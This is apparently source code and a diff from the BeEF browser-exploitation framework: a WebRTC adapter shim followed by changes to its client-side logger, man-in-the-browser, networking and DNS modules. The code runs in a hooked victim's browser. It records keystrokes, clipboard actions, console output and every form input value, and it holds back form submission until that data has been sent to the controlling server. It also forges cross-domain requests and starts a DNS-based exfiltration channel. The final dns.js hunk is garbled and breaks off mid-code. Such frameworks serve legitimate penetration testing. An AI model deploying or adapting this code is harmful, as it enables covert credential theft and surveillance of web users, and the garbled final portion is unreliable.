 *  Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.
 *
 *  Use of this source code is governed by a BSD-style license
 *  that can be found in the LICENSE file in the root of the source
 *  tree.
 */
 /* More information about these options at jshint.com/docs/options */
 /* jshint browser: true, camelcase: true, curly: true, devel: true,
   eqeqeq: true, forin: false, globalstrict: true, node: true,
   quotmark: single, undef: true, unused: strict */
 /* global mozRTCIceCandidate, mozRTCPeerConnection, Promise,
 mozRTCSessionDescription, webkitRTCPeerConnection, MediaStreamTrack */
 /* exported trace,requestUserMedia */
 'use strict';
 var getUserMedia = null;
 var attachMediaStream = null;
 var reattachMediaStream = null;
 var webrtcDetectedBrowser = null;
 var webrtcDetectedVersion = null;
 var webrtcMinimumVersion = null;
 function trace(text) {
  // This function is used for logging.
  if (text[text.length - 1] === '\n') {
    text = text.substring(0, text.length - 1);
  }
  if (window.performance) {
    var now = (window.performance.now() / 1000).toFixed(3);
    beef.debug(now + ': ' + text);
  } else {
    beef.debug(text);
  }
 }
 if (navigator.mozGetUserMedia) {
  webrtcDetectedBrowser = 'firefox';
  // the detected firefox version.
  webrtcDetectedVersion =
    parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
  // the minimum firefox version still supported by adapter.
  webrtcMinimumVersion = 31;
  // The RTCPeerConnection object.
  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
    if (webrtcDetectedVersion < 38) {
      // .urls is not supported in FF < 38.
      // create RTCIceServers with a single url.
      if (pcConfig && pcConfig.iceServers) {
        var newIceServers = [];
        for (var i = 0; i < pcConfig.iceServers.length; i++) {
          var server = pcConfig.iceServers[i];
          if (server.hasOwnProperty('urls')) {
            for (var j = 0; j < server.urls.length; j++) {
              var newServer = {
                url: server.urls[j]
              };
              if (server.urls[j].indexOf('turn') === 0) {
                newServer.username = server.username;
                newServer.credential = server.credential;
              }
              newIceServers.push(newServer);
            }
          } else {
            newIceServers.push(pcConfig.iceServers[i]);
          }
        }
        pcConfig.iceServers = newIceServers;
      }
    }
    return new mozRTCPeerConnection(pcConfig, pcConstraints);
  };
  try {
    // The RTCSessionDescription object.
    window.RTCSessionDescription = mozRTCSessionDescription;
    // The RTCIceCandidate object.
    window.RTCIceCandidate = mozRTCIceCandidate;
  }catch(err) {
  }
  // getUserMedia constraints shim.
  getUserMedia = (webrtcDetectedVersion < 38) ?
      function(c, onSuccess, onError) {
    var constraintsToFF37 = function(c) {
      if (typeof c !== 'object' || c.require) {
        return c;
      }
      var require = [];
      Object.keys(c).forEach(function(key) {
        var r = c[key] = (typeof c[key] === 'object') ?
            c[key] : {ideal: c[key]};
        if (r.exact !== undefined) {
          r.min = r.max = r.exact;
          delete r.exact;
        }
        if (r.min !== undefined || r.max !== undefined) {
          require.push(key);
        }
        if (r.ideal !== undefined) {
          c.advanced = c.advanced || [];
          var oc = {};
          oc[key] = {min: r.ideal, max: r.ideal};
          c.advanced.push(oc);
          delete r.ideal;
          if (!Object.keys(r).length) {
            delete c[key];
          }
        }
      });
      if (require.length) {
        c.require = require;
      }
      return c;
    };
    beef.debug('spec: ' + JSON.stringify(c));
    c.audio = constraintsToFF37(c.audio);
    c.video = constraintsToFF37(c.video);
    beef.debug('ff37: ' + JSON.stringify(c));
    return navigator.mozGetUserMedia(c, onSuccess, onError);
  } : navigator.mozGetUserMedia.bind(navigator);
  navigator.getUserMedia = getUserMedia;
  // Shim for mediaDevices on older versions.
  if (!navigator.mediaDevices) {
    navigator.mediaDevices = {getUserMedia: requestUserMedia,
      addEventListener: function() { },
      removeEventListener: function() { }
    };
  }
  navigator.mediaDevices.enumerateDevices =
      navigator.mediaDevices.enumerateDevices || function() {
    return new Promise(function(resolve) {
      var infos = [
        {kind: 'audioinput', deviceId: 'default', label:'', groupId:''},
        {kind: 'videoinput', deviceId: 'default', label:'', groupId:''}
      ];
      resolve(infos);
    });
  };
  if (webrtcDetectedVersion < 41) {
    // Work around http://bugzil.la/1169665
    var orgEnumerateDevices =
        navigator.mediaDevices.enumerateDevices.bind(navigator.mediaDevices);
    navigator.mediaDevices.enumerateDevices = function() {
      return orgEnumerateDevices().then(undefined, function(e) {
        if (e.name === 'NotFoundError') {
          return [];
        }
        throw e;
      });
    };
  }
  // Attach a media stream to an element.
  attachMediaStream = function(element, stream) {
    beef.debug('Attaching media stream');
    element.mozSrcObject = stream;
  };
  reattachMediaStream = function(to, from) {
    beef.debug('Reattaching media stream');
    to.mozSrcObject = from.mozSrcObject;
  };
 } else if (navigator.webkitGetUserMedia) {
  webrtcDetectedBrowser = 'chrome';
  // the detected chrome version.
  webrtcDetectedVersion =
    parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2], 10);
  // the minimum chrome version still supported by adapter.
  webrtcMinimumVersion = 38;
  // The RTCPeerConnection object.
  window.RTCPeerConnection = function(pcConfig, pcConstraints) {
    var pc = new webkitRTCPeerConnection(pcConfig, pcConstraints);
    var origGetStats = pc.getStats.bind(pc);
    pc.getStats = function(selector, successCallback, errorCallback) { // jshint ignore: line
      // If selector is a function then we are in the old style stats so just
      // pass back the original getStats format to avoid breaking old users.
      if (typeof selector === 'function') {
        return origGetStats(selector, successCallback);
      }
      var fixChromeStats = function(response) {
        var standardReport = {};
        var reports = response.result();
        reports.forEach(function(report) {
          var standardStats = {
            id: report.id,
            timestamp: report.timestamp,
            type: report.type
          };
          report.names().forEach(function(name) {
            standardStats[name] = report.stat(name);
          });
          standardReport[standardStats.id] = standardStats;
        });
        return standardReport;
      };
      var successCallbackWrapper = function(response) {
        successCallback(fixChromeStats(response));
      };
      return origGetStats(successCallbackWrapper, selector);
    };
    return pc;
  };
  // add promise support
  ['createOffer', 'createAnswer'].forEach(function(method) {
    var nativeMethod = webkitRTCPeerConnection.prototype[method];
    webkitRTCPeerConnection.prototype[method] = function() {
      var self = this;
      if (arguments.length < 1 || (arguments.length === 1 &&
          typeof(arguments[0]) === 'object')) {
        var opts = arguments.length === 1 ? arguments[0] : undefined;
        return new Promise(function(resolve, reject) {
          nativeMethod.apply(self, [resolve, reject, opts]);
        });
      } else {
        return nativeMethod.apply(this, arguments);
      }
    };
  });
  ['setLocalDescription', 'setRemoteDescription',
      'addIceCandidate'].forEach(function(method) {
    var nativeMethod = webkitRTCPeerConnection.prototype[method];
    webkitRTCPeerConnection.prototype[method] = function() {
      var args = arguments;
      var self = this;
      return new Promise(function(resolve, reject) {
        nativeMethod.apply(self, [args[0],
            function() {
              resolve();
              if (args.length >= 2) {
                args[1].apply(null, []);
              }
            },
            function(err) {
              reject(err);
              if (args.length >= 3) {
                args[2].apply(null, [err]);
              }
            }]
          );
      });
    };
  });
  // getUserMedia constraints shim.
  getUserMedia = function(c, onSuccess, onError) {
    var constraintsToChrome = function(c) {
      if (typeof c !== 'object' || c.mandatory || c.optional) {
        return c;
      }
      var cc = {};
      Object.keys(c).forEach(function(key) {
        if (key === 'require' || key === 'advanced') {
          return;
        }
        var r = (typeof c[key] === 'object') ? c[key] : {ideal: c[key]};
        if (r.exact !== undefined && typeof r.exact === 'number') {
          r.min = r.max = r.exact;
        }
        var oldname = function(prefix, name) {
          if (prefix) {
            return prefix + name.charAt(0).toUpperCase() + name.slice(1);
          }
          return (name === 'deviceId') ? 'sourceId' : name;
        };
        if (r.ideal !== undefined) {
          cc.optional = cc.optional || [];
          var oc = {};
          if (typeof r.ideal === 'number') {
            oc[oldname('min', key)] = r.ideal;
            cc.optional.push(oc);
            oc = {};
            oc[oldname('max', key)] = r.ideal;
            cc.optional.push(oc);
          } else {
            oc[oldname('', key)] = r.ideal;
            cc.optional.push(oc);
          }
        }
        if (r.exact !== undefined && typeof r.exact !== 'number') {
          cc.mandatory = cc.mandatory || {};
          cc.mandatory[oldname('', key)] = r.exact;
        } else {
          ['min', 'max'].forEach(function(mix) {
            if (r[mix] !== undefined) {
              cc.mandatory = cc.mandatory || {};
              cc.mandatory[oldname(mix, key)] = r[mix];
            }
          });
        }
      });
      if (c.advanced) {
        cc.optional = (cc.optional || []).concat(c.advanced);
      }
      return cc;
    };
    beef.debug('spec:   ' + JSON.stringify(c)); // whitespace for alignment
    c.audio = constraintsToChrome(c.audio);
    c.video = constraintsToChrome(c.video);
    beef.debug('chrome: ' + JSON.stringify(c));
    return navigator.webkitGetUserMedia(c, onSuccess, onError);
  };
  navigator.getUserMedia = getUserMedia;
  // Attach a media stream to an element.
  attachMediaStream = function(element, stream) {
    if (typeof element.srcObject !== 'undefined') {
      element.srcObject = stream;
    } else if (typeof element.src !== 'undefined') {
      element.src = URL.createObjectURL(stream);
    } else {
      beef.debug('Error attaching stream to element.');
    }
  };
  reattachMediaStream = function(to, from) {
    to.src = from.src;
  };
  if (!navigator.mediaDevices) {
    navigator.mediaDevices = {getUserMedia: requestUserMedia,
                              enumerateDevices: function() {
      return new Promise(function(resolve) {
        var kinds = {audio: 'audioinput', video: 'videoinput'};
        return MediaStreamTrack.getSources(function(devices) {
          resolve(devices.map(function(device) {
            return {label: device.label,
                    kind: kinds[device.kind],
                    deviceId: device.id,
                    groupId: ''};
          }));
        });
      });
    }};
    // in case someone wants to listen for the devicechange event.
    navigator.mediaDevices.addEventListener = function() { };
    navigator.mediaDevices.removeEventListener = function() { };
  }
 } else if (navigator.mediaDevices && navigator.userAgent.match(
    /Edge\/(\d+).(\d+)$/)) {
  webrtcDetectedBrowser = 'edge';
  webrtcDetectedVersion =
    parseInt(navigator.userAgent.match(/Edge\/(\d+).(\d+)$/)[2], 10);
  // the minimum version still supported by adapter.
  webrtcMinimumVersion = 12;
  attachMediaStream = function(element, stream) {
    element.srcObject = stream;
  };
  reattachMediaStream = function(to, from) {
    to.srcObject = from.srcObject;
  };
 } else {
  // console.log('Browser does not appear to be WebRTC-capable');
 }
 // Returns the result of getUserMedia as a Promise.
 function requestUserMedia(constraints) {
  return new Promise(function(resolve, reject) {
    getUserMedia(constraints, resolve, reject);
  });
 }
 if (typeof module !== 'undefined') {
  module.exports = {
    RTCPeerConnection: window.RTCPeerConnection,
    getUserMedia: getUserMedia,
    attachMediaStream: attachMediaStream,
    reattachMediaStream: reattachMediaStream,
    webrtcDetectedBrowser: webrtcDetectedBrowser,
    webrtcDetectedVersion: webrtcDetectedVersion,
    webrtcMinimumVersion: webrtcMinimumVersion
    //requestUserMedia: not exposed on purpose.
    //trace: not exposed on purpose.
  };
 } else if ((typeof require === 'function') && (typeof define === 'function')) {
  // Expose objects and functions when RequireJS is doing the loading.
  define([], function() {
    return {
      RTCPeerConnection: window.RTCPeerConnection,
      getUserMedia: getUserMedia,
      attachMediaStream: attachMediaStream,
      reattachMediaStream: reattachMediaStream,
      webrtcDetectedBrowser: webrtcDetectedBrowser,
      webrtcDetectedVersion: webrtcDetectedVersion,
      webrtcMinimumVersion: webrtcMinimumVersion
      //requestUserMedia: not exposed on purpose.
      //trace: not exposed on purpose.
    };
  });
 }
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -45,6 +45,10 @@ beef.logger = {
        this.data = null;
        this.mods = null;
    },
    /**
     * Prevents from recursive event handling on form submission
     */
    in_submit: false,
 	/**
 	 * Starts the logger
@@ -56,6 +60,45 @@ beef.logger = {
 		var d = new Date();
 		this.time = d.getTime();
        $j(document).off('keypress');
        $j(document).off('click');
        $j(window).off('focus');
        $j(window).off('blur');
        $j('form').off('submit');
        $j(document.body).off('copy');
        $j(document.body).off('cut');
        $j(document.body).off('paste');
        if (!!window.console && typeof window.console == "object") {
          try {
            var oldInfo = window.console.info;
            console.info = function (message) {
              beef.logger.console('info', message);
              oldInfo.apply(console, arguments);
            };
            var oldLog = window.console.log;
            console.log = function (message) {
              beef.logger.console('log', message);
              oldLog.apply(console, arguments);
            };
            var oldWarn = window.console.warn;
            console.warn = function (message) {
              beef.logger.console('warn', message);
              oldWarn.apply(console, arguments);
            };
            var oldDebug = window.console.debug;
            console.debug = function (message) {
              beef.logger.console('debug', message);
              oldDebug.apply(console, arguments);
            };
            var oldError = window.console.error;
            console.error = function (message) {
              beef.logger.console('error', message);
              oldError.apply(console, arguments);
            };
         } catch(e) {}
       }
 		$j(document).keypress(
 			function(e) { beef.logger.keypress(e); }
 		).click(
@@ -67,17 +110,19 @@ beef.logger = {
 			function(e) { beef.logger.win_blur(e); }
 		);
 		$j('form').submit(
-			function(e) { beef.logger.submit(e); }
+			function(e) { 
                beef.logger.submit(e); 
            }
 		);
-		document.body.oncopy = function() {
+		$j(document.body).on('copy', function() {
 			setTimeout("beef.logger.copy();", 10);
-		};
+		});
-		document.body.oncut = function() {
+		$j(document.body).on('cut', function() {
 			setTimeout("beef.logger.cut();", 10);
-		};
+		});
-		document.body.onpaste = function() {
+		$j(document.body).on('paste', function() {
 			beef.logger.paste();
-		}
+		});
 	},
 	/**
@@ -86,7 +131,15 @@ beef.logger = {
 	stop: function() {
 		this.running = false;
 		clearInterval(this.timer);
-		$j(document).keypress(null);
+        $j(document).off('keypress');
        $j(document).off('click');
        $j(window).off('focus');
        $j(window).off('blur');
        $j('form').off('submit');
        $j(document.body).off('copy');
        $j(document.body).off('cut');
        $j(document.body).off('paste');
        // TODO: reset console
 	},
    /**
@@ -164,6 +217,18 @@ beef.logger = {
 		} catch(e) {}
 	},
        /**
         * Console function fires when data is sent to the browser console.
         */
        console: function(type, message) {
 		try {
 			var c = new beef.logger.e();
 			c.type = 'console';
 			c.data = type + ': ' + message;
 			this.events.push(c);
 		} catch(e) {}
 	},
 	/**
 	 * Paste function fires when the user pastes data from the clipboard.
 	 */
@@ -181,16 +246,37 @@ beef.logger = {
     * TODO: Cleanup this function
 	 */
 	submit: function(e) {
        if (beef.logger.in_submit) {
            return true;
        }
 		try {
 			var f = new beef.logger.e();
 			var values = "";
 			f.type = 'submit';
 			f.target = beef.logger.get_dom_identifier(e.target);
            var jqForms = $j(e.target);
            var values = jqForms.find('input').map(function() { 
                    var inp = $j(this);    
                    return inp.attr('name') + '=' + inp.val(); 
                }).get().join();
            beef.debug('submitting form inputs: ' + values);
            /*
 			for (var i = 0; i < e.target.elements.length; i++) {
 	            values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
 	        }
-			f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
+            */
 			f.data = 'Action: '+jqForms.attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
 			this.events.push(f);
            this.queue();
            this.target = null;
            beef.net.flush(function done() {
                beef.debug("Submitting the form");
                beef.logger.in_submit = true;
                jqForms.submit();
                beef.logger.in_submit = false;
                beef.debug("Done submitting");
            });
            e.preventDefault();
            return false;
 		} catch(e) {}
 	},
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -106,7 +106,7 @@ beef.mitb = {
                history.pushState({ Be:"EF" }, title, e.currentTarget);
            }
        } catch (e) {
-            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+            beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
        }
        return false;
    },
@@ -114,18 +114,39 @@ beef.mitb = {
    // Hooks forms and prevents them from linking away
    poisonForm:function (form) {
        form.onsubmit = function (e) {
            // Collect <input> tags.
            var inputs = form.getElementsByTagName("input");
            var query = "";
            for (var i = 0; i < inputs.length; i++) {
                if (i > 0 && i < inputs.length - 1) query += "&";
                switch (inputs[i].type) {
                    case "submit":
                        break;
                    default:
-                        query += inputs[i].name + "=" + inputs[i].value;
+                        query += inputs[i].name + "=" + inputs[i].value + '&';
                        break;
                }
            }
            // Collect selected options from the form.
            var selects = form.getElementsByTagName("select");
            for (var i = 0; i < selects.length; i++) {
                var select = selects[i];
                query += select.name + "=" + select.options[select.selectedIndex].value + '&';
            }
            // We should be gathering 'submit' inputs as well, as there are 
            // applications demanding this parameter.
            var submit = $j('*[type="submit"]', form);
            if(submit.length) {
                // Append name of the submit button/input.
                query += submit.attr('name') + '=' + submit.attr('value');
            }
            if(query.slice(-1) == '&') {
                query = query.slice(0, -1);
            }
            e.preventdefault;
            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
            history.pushState({ Be:"EF" }, "", form.action);
@@ -219,4 +240,4 @@ beef.mitb = {
    }
 };
-beef.regCmp('beef.mitb');
+beef.regCmp('beef.mitb');
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -35,6 +35,7 @@ beef.net = {
    command: function () {
        this.cid = null;
        this.results = null;
        this.status = null;
        this.handler = null;
        this.callback = null;
    },
@@ -84,13 +85,15 @@ beef.net = {
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
     * @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
     * @param: {Function} callback: the function to call after execution
     */
-    queue: function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, status, callback) {
        if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
            var s = new beef.net.command();
            s.cid = cid;
            s.results = beef.net.clean(results);
            s.status = status;
            s.callback = callback;
            s.handler = handler;
            this.cmd_queue.push(s);
@@ -105,22 +108,32 @@ beef.net = {
     * @param: {String} handler: the server-side handler that will be called
     * @param: {Integer} cid: command id
     * @param: {String} results: the data to send
     * @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
     * @param: {Function} callback: the function to call after execution
     * @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
     */
-    send: function (handler, cid, results, callback) {
+    send: function (handler, cid, results, exec_status, callback) {
        // defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
        var status = 0;
        if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
-            this.queue(handler, cid, results, callback);
+            this.queue(handler, cid, results, status, callback);
            this.flush();
        } else {
            try {
                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
-                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+                    '", "status": "' + exec_status +
                    '", "callback": "' + callback +
                    '","bh":"' + beef.session.get_hook_session_id() + '" }');
            } catch (e) {
-                this.queue(handler, cid, results, callback);
+                this.queue(handler, cid, results, status, callback);
                this.flush();
            }
        }
        return status;
    },
    /**
@@ -131,7 +144,7 @@ beef.net = {
     * XHR-polling mechanism. If WebSockets are used, the data is sent
     * back to BeEF straight away.
     */
-    flush: function () {
+    flush: function (callback) {
        if (this.cmd_queue.length > 0) {
            var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
            this.cmd_queue.length = 0;
@@ -149,7 +162,11 @@ beef.net = {
                    stream.packets.push(packet);
                }
                stream.pc = stream.packets.length;
-                this.push(stream);
+                this.push(stream, callback);
            }
        } else {
            if ((typeof callback != 'undefined') && (callback != null)) {
                callback();
            }
        }
    },
@@ -169,10 +186,18 @@ beef.net = {
     * It uses beef.net.request to send back the data.
     * @param: {Object} stream: the stream object to be sent back.
     */
-    push: function (stream) {
+    push: function (stream, callback) {
        //need to implement wait feature here eventually
        if (typeof callback === 'undefined') {
            callback = null;
        }
        for (var i = 0; i < stream.pc; i++) {
-            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            var cb = null;
            if (i == (stream.pc - 1)) {
                cb = callback;
            }
            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, 
                    stream.get_packet_data(), 10, 'text', cb);
        }
    },
@@ -257,6 +282,7 @@ beef.net = {
                response.status_code = jqXHR.status;
                response.status_text = textStatus;
                response.duration = (end_time - start_time);
                response.port_status = "open";
            },
            complete: function (jqXHR, textStatus) {
                response.status_code = jqXHR.status;
@@ -273,7 +299,7 @@ beef.net = {
                    response.port_status = "open";
                }
            }
-        }).done(function () {
+        }).always(function () {
                if (callback != null) {
                    callback(response);
                }
@@ -287,21 +313,28 @@ beef.net = {
     *  - allowCrossDomain: set cross-domain requests as allowed or blocked
     *
     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
     * Example usage:
     * beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
     *   true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
     *   alert(response.response_body)})
     */
    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
        // check if same domain or cross domain
        var cross_domain = true;
        if (domain == "undefined" || path == "undefined") {
            beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
            return;
        }
-        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+
        // check if same domain or cross domain
        var cross_domain = true;
        if (document.domain == domain && document.location.protocol == scheme + ':') {
            if (document.location.port == "" || document.location.port == null) {
                cross_domain = !(port == "80" || port == "443");
            } else {
                if (document.location.port == port) cross_domain = false;
            }
        }
        // build the url
        var url = "";
        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -320,13 +353,27 @@ beef.net = {
        // if cross-domain requests are not allowed and the request is cross-domain
        // don't proceed and return
-        if (allowCrossDomain == "false" && cross_domain && callback != null) {
+        if (allowCrossDomain == "false" && cross_domain) {
            beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
            response.status_code = -1;
            response.status_text = "crossdomain";
            response.port_status = "crossdomain";
            response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
            response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
-            callback(response, requestid);
+            if (callback != null) callback(response, requestid);
            return response;
        }
        // if the request was cross-domain from a HTTPS origin to HTTP
        // don't proceed and return
        if (document.location.protocol == 'https:' && scheme == 'http') {
            beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
            response.status_code = -1;
            response.status_text = "mixedcontent";
            response.port_status = "mixedcontent";
            response.response_body = "ERROR: Mixed Active Content. The request was not sent.\n";
            response.headers = "ERROR: Mixed Active Content. The request was not sent.\n";
            if (callback != null) callback(response, requestid);
            return response;
        }
@@ -362,6 +409,8 @@ beef.net = {
                }
            },
            data: data,
            // http server responded successfully
            success: function (data, textStatus, xhr) {
                var end_time = new Date().getTime();
@@ -465,13 +514,47 @@ beef.net = {
        return false;
    },
    /**
     * Checks if the specified port is valid
     */
    is_valid_port: function (port) {
      if (isNaN(port)) return false;
      if (port > 65535 || port < 0) return false;
      return true;
    },
    /**
     * Checks if the specified IP address is valid
     */
    is_valid_ip: function (ip) {
      if (ip == null) return false;
      var ip_match = ip.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
      if (ip_match == null) return false;
      return true;
    },
    /**
     * Checks if the specified IP address range is valid
     */
    is_valid_ip_range: function (ip_range) {
      if (ip_range == null) return false;
      var range_match = ip_range.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
      if (range_match == null || range_match[1] == null) return false;
      return true;
    },
    /**
     * Sends back browser details to framework, calling beef.browser.getDetails()
     */
    browser_details: function () {
        var details = beef.browser.getDetails();
        var res = null;
        details['HookSessionID'] = beef.session.get_hook_session_id();
        this.send('/init', 0, details);
        if(details != null)
            res = true;
        return res;
    }
 };
--- a/core/main/client/net/connection.js
+++ b/core/main/client/net/connection.js
@@ -0,0 +1,47 @@
 //
 // Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 // beef.net.connection - wraps Mozilla's Network Information API
 // https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
 // https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
 beef.net.connection = {
  /* Returns the connection type
   * @example: beef.net.connection.type()
   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
   * @return: {String} connection type or 'unknown'.
   **/
  type: function () {
    try {
      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
      var type = connection.type;
      if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
    } catch(e) {
      beef.debug("Error retrieving connection type: " + e.message);
      return 'unknown';
    }
  },
  /* Returns the maximum downlink speed of the connection
   * @example: beef.net.connection.downlinkMax()
   * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
   * @return: {String} downlink max or 'unknown'.
   **/
  downlinkMax: function () {
    try {
      var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
      var max = connection.downlinkMax;
      if (max) return max; else return 'unknown';
    } catch(e) {
      beef.debug("Error retrieving connection downlink max: " + e.message);
      return 'unknown';
    }
  }
 };
 beef.regCmp('beef.net.connection');
--- a/core/main/client/net/cors.js
+++ b/core/main/client/net/cors.js
@@ -17,9 +17,10 @@ beef.net.cors = {
     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
     * @param url {String} url
     * @param data {String} request body
     * @param timeout {Integer} request timeout in milliseconds
     * @param callback {Function} function to callback on completion
     */
-    request: function(method, url, data, callback) {
+    request: function(method, url, data, timeout, callback) {
    var xhr;
    var response = new this.response;
@@ -29,6 +30,7 @@ beef.net.cors = {
        if ('withCredentials' in xhr) {
            xhr.open(method, url, true);
            xhr.timeout = parseInt(timeout, 10);
            xhr.onerror = function() {
            };
            xhr.onreadystatechange = function() {
--- a/core/main/client/net/dns.js
+++ b/core/main/client/net/dns.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,49 +18,67 @@ beef.net.dns = {
 	handler: "dns",
-	send: function(msgId, messageString, domain, wait, callback) {
+	send: function(msgId, data, domain, callback) {
-		var dom = document.createElement('b');
+        var encode_data = function(str) {
            var result="";
            for(i=0;i<str.length;++i) {
                result+=str.charCodeAt(i).toString(16).toUpperCase();
            }
            return result;
        };
-		// DNS settings
+        var encodedData = encodeURI(encode_data(data));
 		var max_domain_length = 255-5-5-5-5-5;
 		var max_segment_length = max_domain_length - domain.length;
-		// splits strings into chunks
+        beef.debug(encodedData);
-		String.prototype.chunk = function(n) {
+        beef.debug("_encodedData_ length: " + encodedData.length);
 			if (typeof n=='undefined') n=100;
 			return this.match(RegExp('.{1,'+n+'}','g'));
 		};
-		// XORs a string
+        // limitations to DNS according to RFC 1035:
-		xor_encrypt = function(str, key) {
+        // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
-			var result="";
+        // o Domain names are limited to 255 characters in length (including dots)
-			for(i=0;i<str.length;++i) {
+        // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
-				result+=String.fromCharCode(key^str.charCodeAt(i));
+        // o Subdomains are limited to 63 characters in length (including the trailing dot)
 			}
 			return result;
 		};
-		// sends a DNS request
+        // DNS request structure:
-		sendQuery = function(query) {
+        // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
-			beef.debug("Requesting: "+query);
+      //max_length: 3.   3   .   3   . 63 . x
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }
 			img.onerror = function() { dom.removeChild(this); }
 			dom.appendChild(img);
 		};
-		// encode message
+        // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
-		var xor_key = Math.floor(Math.random()*99000+1000);
+        // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
-		encoded_message = encodeURI(xor_encrypt(messageString, xor_key)).replace(/%/g,".");
+        var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
        var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
        var max_data_segment_length = 63; // by RFC
-		// Split message into segments
